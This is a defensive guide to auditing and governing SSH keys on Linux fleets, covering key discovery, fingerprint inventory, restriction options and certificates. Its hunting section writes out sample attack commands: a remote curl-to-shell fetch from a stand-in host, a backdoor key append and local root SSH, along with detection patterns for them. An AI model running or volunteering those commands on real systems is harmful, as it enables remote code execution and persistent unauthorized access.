A production Linux server gets rebuilt from an old image. A contractor leaves. A CI/CD job is retired. Months later, the same SSH public keys are still sitting in authorized_keys, silently trusted by root or a service account nobody owns anymore.
That is how SSH key sprawl usually happens. It rarely stems from one obvious failure. Instead, it accumulates through years of small access decisions that never expire. For attackers, those forgotten keys are not clutter; they represent silent SSH persistence, a vector for Linux lateral movement, and a direct path around the identity controls your team thinks are protecting the fleet.
This guide explains how experienced Linux administrators should approach a Linux SSH key audit: where keys hide, what they look like during an investigation, and how to transition to sustainable SSH key lifecycle management without breaking production.
Before changing a single configuration line, ask your team these five questions:
SSH key sprawl is not just "too many files." It is unmanaged trust.
Every public key in an authorized_keys file is a standing, unsupervised access decision. The operating system is stating, “Whoever holds the matching private key can authenticate as this user.” That is acceptable when the key is documented, current, restricted, and monitored. It becomes a massive liability when nobody knows who created it, why it exists, or where the private key lives.
The core issue is that SSH key-based access does not naturally follow the lifecycle of normal identity systems. Passwords expire. SSO accounts get disabled. PAM workflows require explicit approval. SSH keys, unless managed deliberately, remain valid indefinitely.
The National Institute of Standards and Technology (NIST) has explicitly warned that SSH-based interactive and automated access requires strict provisioning, termination, and monitoring. Yet, while organizations pour resources into central identity directories, authorized_keys security is frequently treated as background infrastructure rather than a critical identity control layer.
That control gap is where sprawl thrives. A typical Linux estate quickly fills up with a chaotic mix of user keys, root keys, service keys, deployment keys, break-glass keys, vendor keys, cloud-init keys, and leftovers from decommissioned scripts. To the SSH daemon, a legitimate administrative key and an orphaned key look identical.
Never start cleanup by deleting keys you don’t recognize. Production systems often rely on poorly documented automation, and removing the wrong key can break backups, deployments, configuration management, or emergency access. Keep discovery and remediation separate.
SSH is trusted because it is familiar. Administrators rely on it daily for troubleshooting, patching, and incident response. Because it is a foundational tool, it is easy to view SSH access as static infrastructure rather than highly privileged identity management.
Attackers exploit this familiarity. A valid SSH key provides quiet access without password guessing, without triggering multi-factor authentication (MFA) in standard setups, and without generating the loud credential-failure noise that alarms Security Operations Centers (SOCs).
If an attacker compromises a user account and writes their own public key to that account’s authorized_keys file, they have secured a reliable backdoor. The SANS Internet Storm Center describes this as one of the first persistence moves automated bots attempt after compromising a Unix host.
MITRE ATT&CK tracks this behavior under SSH Authorized Key Manipulation (T1098.004). They note that adversaries regularly modify these files directly, through shell commands, or via cloud APIs to maintain persistence, escalate privileges, or access higher-privileged identities across Linux, macOS, ESXi, and cloud environments.
The risk of automation key sprawl moved from theoretical to catastrophic during a widespread supply chain campaign tracked to a threat actor group known as TeamPCP.
Instead of targeting hardened downstream production applications directly, the attackers systematically compromised the developer ecosystem. They injected backdoors into open-source Python packages (like liteLLM on PyPI) and published trojanized plugins to the Jenkins Marketplace (including the widely used Checkmarx AST plugin).
Once the malicious plugins or poisoned dependencies executed within target environments, they ran with controller-level privileges. TeamPCP's automated payload immediately launched an aggressive credential harvester designed to parse the file system for over 50 categories of secrets.
Among the highest-value targets seized were unpassphrased SSH private keys and cloud credentials sitting on legacy, developer-managed, or forgotten Jenkins instances. Because many organizations completely lack an automated access lifecycle for automation infrastructure, these extracted keys still matched active authorized_keys files across production fleets. Attackers used these forgotten paths to bypass standard perimeter security, move laterally into production Kubernetes clusters, and establish silent, long-term persistence without ever triggering standard brute-force or credential-failure alerts.
The root cause was not an exploit in OpenSSH itself; it was a systemic failure to treat CI/CD and automation keys as ephemeral, high-risk identities.
When reviewing an environment, do not simply count files. Look for structural anomalies and trust relationships that do not match your current operational reality.
Attackers moving laterally often abuse legitimate OpenSSH binaries to execute commands across your network. Watch out for these specific execution patterns in your process and shell history logs:
    # Bypassing strict host checking to push remote shell payloads
    ssh -oBatchMode=yes -oStrictHostKeyChecking=no <user>@<host> 'curl http://malicious.local/script.sh | sh'
    # Appending a key directly to a profile via a single shell command
    echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
    # Local identity switching to bypass standard administrative logs
    ssh root@localhost -i /tmp/id_rsa
The last example is easy to overlook. Local SSH authentication is frequently abused for identity switching on the same machine. SANS points out that local SSH to a privileged account often bypasses sudo logs and the other tracking mechanisms that administrators rely on for user attribution.
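As a starting point for hunting, the three execution patterns above can be turned into a simple search over shell history or process-audit exports. This is a minimal sketch: the function name `scan_ssh_abuse` and the regular expressions are illustrative assumptions, not a complete detection rule set, and they will need tuning against your own log formats.

```shell
# scan_ssh_abuse FILE...
# Print "file:line:text" for every line that resembles one of the three
# patterns: (1) host-key checking disabled plus a download piped to a shell,
# (2) a key appended to an authorized_keys file, (3) SSH to root on the local
# machine or with an identity file stored under /tmp.
# The regexes are illustrative assumptions; extend them for your environment.
scan_ssh_abuse() {
    grep -HnE \
        -e 'ssh .*StrictHostKeyChecking=no.*(curl|wget) ' \
        -e '>> *[^ ]*authorized_keys' \
        -e 'ssh .*(root@(localhost|127\.0\.0\.1)|-i */tmp/)' \
        "$@"
}
```

A typical call would be `scan_ssh_abuse /root/.bash_history /home/*/.bash_history`. Shell history is trivial for an intruder to edit, so treat a hit as a lead and a clean result as inconclusive; process-level audit logs are a stronger source where you have them.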
To bring an unmanaged environment under control safely, follow a structured, procedural approach.
Locate every active authorized_keys and authorized_keys2 file across your file systems. Do not assume they only live in /home. Search systematically:
    find /home /root /var/lib -name "authorized_keys*" -type f
A public key string is long and unwieldy. To compare keys accurately across multiple hosts, extract their unique cryptographic fingerprints using ssh-keygen:
    ssh-keygen -lf /home/user/.ssh/authorized_keys
For each key in the file, this prints the key size in bits, the fingerprint (SHA256 by default, or MD5 if you pass -E md5), the comment string, and the key type. The comment is free text chosen by whoever generated the key, so treat it as a hint about ownership rather than proof.
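The two commands can be combined into a per-host inventory. The sketch below is one way to do it, under a few assumptions: the function names are made up for illustration, home directories are taken from a passwd-format file (so accounts living under /opt or /srv are not missed), and ssh-keygen from OpenSSH is installed. It will not see key files that sshd_config relocates with AuthorizedKeysFile.

```shell
# list_keyfiles PASSWD_FILE
# Print every authorized_keys* file found in the .ssh directory of each home
# directory listed in a passwd-format file (field 6).
list_keyfiles() {
    cut -d: -f6 "$1" | sort -u | while IFS= read -r home; do
        [ -d "$home/.ssh" ] || continue
        find "$home/.ssh" -maxdepth 1 -type f -name 'authorized_keys*'
    done
}

# fingerprint_inventory PASSWD_FILE
# Emit one tab-separated row per key: host, file, fingerprint, key type.
# Lines that ssh-keygen cannot parse are skipped silently.
fingerprint_inventory() {
    host=$(uname -n)
    list_keyfiles "$1" | while IFS= read -r file; do
        ssh-keygen -lf "$file" 2>/dev/null |
            awk -v h="$host" -v f="$file" '{ print h "\t" f "\t" $2 "\t" $NF }'
    done
}
```

On a live host you might run `getent passwd > /tmp/passwd.snapshot` followed by `fingerprint_inventory /tmp/passwd.snapshot`, which also picks up directory-backed accounts that never appear in /etc/passwd.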
Map your fingerprints into a central sheet or database. Identify keys that cross security boundaries. A deployment key repeated across a controlled web tier may be expected; a single contractor's public key repeated across three separate administrative accounts and two service accounts is a major architecture flaw.
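Once fingerprints are collected centrally, reuse across accounts is easy to surface. This sketch assumes a hypothetical inventory file with three tab-separated columns (host, account, fingerprint); the layout and the function name `shared_keys` are assumptions made for the example.

```shell
# shared_keys INVENTORY_TSV
# Input columns (tab-separated): host, account, fingerprint.
# Output: one row per fingerprint that is trusted by more than one account,
# with the number of distinct accounts, distinct hosts, and the account list.
shared_keys() {
    awk -F '\t' '
        !seen_acct[$3 SUBSEP $2]++ {
            accts[$3]++
            list[$3] = list[$3] (list[$3] ? "," : "") $2
        }
        !seen_host[$3 SUBSEP $1]++ { hosts[$3]++ }
        END {
            for (fp in accts)
                if (accts[fp] > 1)
                    printf "%s\taccounts=%d\thosts=%d\t%s\n", fp, accts[fp], hosts[fp], list[fp]
        }' "$1" | sort
}
```

A key that shows up under both `root` and a backup account is reported, while a deployment key used by the same `deploy` account on many hosts is not, which matches the distinction drawn above between expected repetition and boundary-crossing reuse.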
Prioritize high-privilege targets. Extract every key inside /root/.ssh/authorized_keys and any service accounts with sudo privileges. Cross-reference these keys against active personnel lists and open tickets.
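The cross-reference itself can be a plain set difference. The sketch below assumes you maintain a hypothetical allow-list file containing one approved fingerprint per line; both the file and the function name are illustrative.

```shell
# unapproved_keys FOUND APPROVED
# Both files hold one fingerprint per line. Print every fingerprint that is
# present in FOUND but has no exact match in APPROVED.
unapproved_keys() {
    grep -vxFf "$2" "$1"
}
```

The FOUND list for root could be produced with `ssh-keygen -lf /root/.ssh/authorized_keys | awk '{ print $2 }'`. Anything this prints is a candidate for investigation, not for immediate deletion.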
Verify the file metadata. Use stat to check the modification times of the files. Cross-reference unexpected modifications with your central authentication logs (/var/log/secure or /var/log/auth.log) to see which user account and IP address were active when the file was modified.
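A rough version of that correlation is sketched here. It assumes GNU find and stat, and a log in the traditional syslog layout ("Mon DD HH:MM:SS host sshd[pid]: ..."); both function names are invented for the example, and hosts that log ISO timestamps or use journald will need a different parser.

```shell
# recent_keyfile_changes DAYS DIR...
# List authorized_keys* files modified within the last DAYS days, printing
# modification time, owner, and path for each.
recent_keyfile_changes() {
    days=$1
    shift
    find "$@" -type f -name 'authorized_keys*' -mtime "-$days" \
        -exec stat -c '%y %U %n' {} + 2>/dev/null
}

# accepted_pubkey_logins LOGFILE
# From sshd "Accepted publickey" lines, print: timestamp, user, source IP,
# and the last field (the key fingerprint in OpenSSH's default log format).
accepted_pubkey_logins() {
    awk '/sshd.*Accepted publickey for/ {
        for (i = 1; i <= NF; i++)
            if ($i == "for") { print $1, $2, $3, $(i + 1), $(i + 3), $NF; break }
    }' "$1"
}
```

For example, `recent_keyfile_changes 30 /home /root` followed by `accepted_pubkey_logins /var/log/auth.log` gives two short lists to line up by timestamp. Modification times can be reset by anyone who can write the file, so an old timestamp does not prove a file is untouched.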
Once orphaned keys are identified, do not delete them via manual shells. Schedule a maintenance window, stage the removals via your configuration management tooling (Ansible, Puppet, or Salt), and monitor application behavior immediately following the run.
Standard file permissions are basic hygiene, but they do not equal comprehensive security control.
Setting an authorized_keys file to 0600 owned by the user stops other local unprivileged users from tampering with it. However, it does absolutely nothing to prevent a compromised user account—or a compromised application running under that user's context—from appending a new key to its own profile.
The SANS ISC recommends considering root ownership with read-only access for user files where appropriate. It also notes that the immutable flag (chattr +i) is not an airtight security boundary against an attacker who already has root, but it adds high detection value because standard automated processes cannot alter the file without throwing an explicit error.
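A quick permission sweep plus the hardening commands might look like the sketch below. It assumes GNU find (for the `-perm /MODE` form); the function name and the account "alice" are placeholders. The hardening commands are left as comments because they need root and change live files.

```shell
# loose_keyfiles DIR...
# Print authorized_keys* files that are writable by group or other.
loose_keyfiles() {
    find "$@" -type f -name 'authorized_keys*' -perm /022 2>/dev/null
}

# Root-only hardening for a single account ("alice" is a placeholder):
#   chown root:root /home/alice/.ssh/authorized_keys   # user can no longer edit in place
#   chmod 644 /home/alice/.ssh/authorized_keys          # user must still be able to read it
#   chattr +i /home/alice/.ssh/authorized_keys          # set the immutable flag
#   lsattr /home/alice/.ssh/authorized_keys             # an "i" in the flags confirms it
```

Root ownership on its own has a gap: a user who owns the surrounding `.ssh` directory can still rename the file and create a new one in its place. The immutable flag blocks that rename, which is part of why the two measures are usually discussed together.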
This requires a mental shift: permissions should support your access model, not just satisfy a compliance checklist. For interactive staging spaces, user-managed keys might be tolerable. For production environments, user-managed trust is an operational liability. The critical question isn't "Are the permissions valid?" It is "Who is authorized to change who can log in?"
If you must use static keys for automation or service accounts, you should drastically narrow their capabilities using OpenSSH enforcement clauses directly within the authorized_keys file.
Instead of a raw public key string, prefix the entry with restrictive options:
    from="10.10.20.15",command="/usr/local/bin/backup-script",no-agent-forwarding,no-port-forwarding,no-X11-forwarding,no-pty ssh-ed25519 AAAA...
This configuration does not make the key entirely harmless, but it drastically reduces its utility if exposed. It accepts the key only from a single source IP address (from="10.10.20.15"), forces the execution of a single, hardcoded script (command="..."), drops interactive terminal access (no-pty), and strips out the forwarding features that attackers exploit for lateral movement.
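To find out how many existing entries carry no restrictions at all, you can look for lines that begin directly with a key type. This is a heuristic sketch with an invented function name; it relies on the fact that an options prefix always comes before the key type on the line.

```shell
# unrestricted_entries FILE
# Print "file:line: keytype comment" for every entry whose first field is a
# key type (ssh-*, ecdsa-sha2-*, sk-*), meaning no options precede the key.
# Comment lines and entries that start with options are skipped.
unrestricted_entries() {
    awk '$1 ~ /^(ssh-|ecdsa-sha2-|sk-)/ {
        print FILENAME ":" NR ": " $1 " " ($3 != "" ? $3 : "(no comment)")
    }' "$1"
}
```

Running `unrestricted_entries /home/svc-backup/.ssh/authorized_keys` (the account name is a placeholder) gives a worklist of service keys to wrap in options. Recent OpenSSH releases also accept a single `restrict` option that turns on all of the `no-*` restrictions at once; check the sshd manual page for your version before relying on it.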
To stop sprawl entirely, move the trust database out of user home directories. You can redirect OpenSSH to look for authorized keys in a central, root-governed directory by modifying /etc/ssh/sshd_config:
    AuthorizedKeysFile /etc/ssh/authorized_keys/%u
Provided the directory and the per-user files in it are owned by root and not writable by anyone else, this shifts write access entirely to root, preventing users or compromised applications from self-provisioning access paths.
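Switching the path without first copying the existing keys would lock everyone out, so the central directory needs to be populated before sshd is reloaded. The sketch below shows one possible staging step. It assumes every account's home directory is named after the user (for example /home/alice), which is not true on every system, and the function name is hypothetical.

```shell
# stage_central_keys HOME_ROOT DEST_DIR
# Copy HOME_ROOT/<user>/.ssh/authorized_keys to DEST_DIR/<user> for every
# user that has one. Files are created mode 644 so sshd can still read them
# on the user's behalf; run as root so the copies end up owned by root.
stage_central_keys() {
    src_root=$1
    dest=$2
    mkdir -p "$dest" && chmod 755 "$dest" || return 1
    for f in "$src_root"/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        user=$(basename "$(dirname "$(dirname "$f")")")
        install -m 644 "$f" "$dest/$user"
    done
}

# After staging and editing sshd_config:
#   sshd -t          # validate the configuration before reloading
# Keep an existing root session open while you test a fresh login.
```

Called as `stage_central_keys /home /etc/ssh/authorized_keys`, this copies keys as they are, including any orphaned ones, so it belongs after the audit rather than before it.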
You can also leverage AuthorizedKeysCommand to pull keys dynamically from an external source, such as a secure identity provider or a secrets engine. However, remember the operational tradeoff: dynamic lookups introduce hard dependencies. If the central lookup service goes down or a network partition occurs, your administrators may be locked out. Experienced teams always test these failure states and maintain isolated, break-glass local authentication paths.
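One way to soften that dependency is to make the lookup helper fail fast and fall back to a root-managed local file. The sketch below is illustrative only: the lookup program path, the fallback directory, and the function name are all hypothetical, and the five-second timeout is an arbitrary choice.

```shell
# Hypothetical locations; override them to suit your environment.
KEY_LOOKUP_CMD=${KEY_LOOKUP_CMD:-/usr/local/bin/idp-key-lookup}
KEY_FALLBACK_DIR=${KEY_FALLBACK_DIR:-/etc/ssh/breakglass_keys}

# fetch_keys USER
# Print the user's keys in authorized_keys format. Ask the external lookup
# program first, giving it at most 5 seconds; if it fails or returns nothing,
# print the root-managed local fallback file for that user, if one exists.
fetch_keys() {
    user=$1
    if keys=$(timeout 5 "$KEY_LOOKUP_CMD" "$user" 2>/dev/null) && [ -n "$keys" ]; then
        printf '%s\n' "$keys"
    elif [ -r "$KEY_FALLBACK_DIR/$user" ]; then
        cat "$KEY_FALLBACK_DIR/$user"
    fi
}

# Matching sshd_config lines, assuming the function is wrapped in a
# root-owned script at this hypothetical path and run as a dedicated user:
#   AuthorizedKeysCommand /usr/local/bin/fetch-keys %u
#   AuthorizedKeysCommandUser keylookup
```

Whichever design you choose, rehearse the outage: block the lookup service in a test environment and confirm that a break-glass login still works before rolling the change out.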
An effective audit must extend past the standard incoming trust files. Attackers analyze the entire SSH configuration to find outbound paths.
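Private keys stored on a host are the most direct outbound path, since each one may unlock accounts elsewhere. The sketch below searches for them by file header. The function name is an assumption, and the header list covers the common OpenSSH and PEM formats rather than every possible encoding.

```shell
# find_private_keys DIR...
# List files that contain an OpenSSH or PEM private key header, wherever
# they are stored and whatever they are named.
find_private_keys() {
    grep -rlE -e '-----BEGIN ((OPENSSH|RSA|EC|DSA|ENCRYPTED) )?PRIVATE KEY-----' "$@" 2>/dev/null
}
```

A sweep such as `find_private_keys /home /root /var/lib/jenkins` (the Jenkins path is an example) shows where outbound credentials live. For each hit, a commonly used check is `ssh-keygen -y -P '' -f FILE`: if it succeeds, the key most likely has no passphrase. The same accounts' `known_hosts` and `~/.ssh/config` files then indicate which hosts those keys were probably used against.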
Eliminating static SSH keys across a massive fleet overnight is rarely realistic. A pragmatic path forward requires categorizing access into distinct operational layers:
| Access Category | Governance Strategy |
| --- | --- |
| Human Administrators | Tie access strictly to individual identity. Implement Central Identity Providers (IdPs), enforce multi-factor authentication, mandate sudo for granular attribution, and eliminate identity debt when employees depart. |
| Automation & CI/CD | Maintain isolated, single-purpose identities. Enforce source IP constraints and forced commands directly in the centralized key configurations. |
| Privileged Infrastructure | Enforce PermitRootLogin no across the fleet. Force administrators to log in using named personal accounts first, creating an explicit audit trail before escalating privileges via sudo. |
For growing or highly regulated enterprises, static public keys create too much long-lived security debt. Moving to SSH certificate authentication is the cleanest long-term structural solution.
Instead of deploying public keys across thousands of production hosts, you configure your SSH daemons to trust a centralized SSH Certificate Authority (CA). Users and automation pipelines authenticate to an identity provider to receive short-lived, cryptographically signed certificates (valid for hours or a single shift).
When certificates are short-lived, access expires naturally. You no longer need to run complex cleanup scripts when a contractor leaves or an automation host is retired; the clock revokes the credential automatically.
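The signing step itself is a single ssh-keygen call. The wrapper below is a bare-bones sketch with an invented function name; in practice the CA private key would sit behind an identity-aware signing service rather than in a file on an administrator's machine, and the file paths shown are placeholders.

```shell
# sign_user_key CA_KEY USER_PUB IDENTITY PRINCIPAL VALIDITY
# Sign USER_PUB with the CA private key. IDENTITY is recorded in the
# certificate and in server logs, PRINCIPAL is the account name the
# certificate may log in as, and VALIDITY is a lifetime such as +8h.
# The certificate is written next to the public key as <name>-cert.pub.
sign_user_key() {
    ssh-keygen -q -s "$1" -I "$3" -n "$4" -V "$5" "$2"
}

# Server side, in sshd_config (the path is a placeholder):
#   TrustedUserCAKeys /etc/ssh/user_ca.pub
# Inspect a certificate's principals and validity window:
#   ssh-keygen -L -f alice-cert.pub
```

For example, `sign_user_key ./ca ./alice.pub alice@corp alice +8h` yields `./alice-cert.pub`, which stops working eight hours later with no cleanup on any server.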
Start your cleanup this week with the highest-risk targets: inventory your root accounts and privileged service entries first. Extract their fingerprints, verify their current business justifications, and purge the entries that cannot be explicitly accounted for. SSH is not inherently insecure; unmanaged trust is.